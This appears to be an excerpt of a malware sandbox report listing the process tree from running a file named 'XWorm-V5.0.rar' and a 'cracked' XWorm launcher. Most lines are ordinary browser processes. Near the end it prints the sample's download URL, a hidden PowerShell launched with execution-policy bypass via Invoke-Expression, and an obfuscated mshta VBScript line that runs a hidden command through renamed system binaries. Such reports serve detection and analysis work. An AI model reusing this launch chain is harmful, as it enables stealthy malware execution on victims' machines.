PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2160 wrote to memory of 3444 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9ac2f3cb8,0x7ff9ac2f3cc8,0x7ff9ac2f3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3308 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5444 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6884 /prefetch:8

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XWorm-V5.0.rar"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe

"C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9ac2f3cb8,0x7ff9ac2f3cc8,0x7ff9ac2f3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7860 /prefetch:1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004DC

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7328 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7640 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\XWorm-V5.6-Cracked-main\XWorm-V5.6-Cracked-main\XWormLauncher.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:EYqiZZZond; "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bkLkOMLFgPrarqIrLnAN4312:wevMAYHF=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-bkLkOMLFgPrarqIrLnAN4312:wevMAYHF=%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OdjrIqDhlz; "

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9ac2f3cb8,0x7ff9ac2f3cc8,0x7ff9ac2f3cd8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1032200725\2107734791" -parentBuildID 20221007134813 -prefsHandle 1744 -prefMapHandle 1736 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c5095fd-91af-444a-bc2d-8e1cdf266237} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1836 24b15eec458 gpu

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

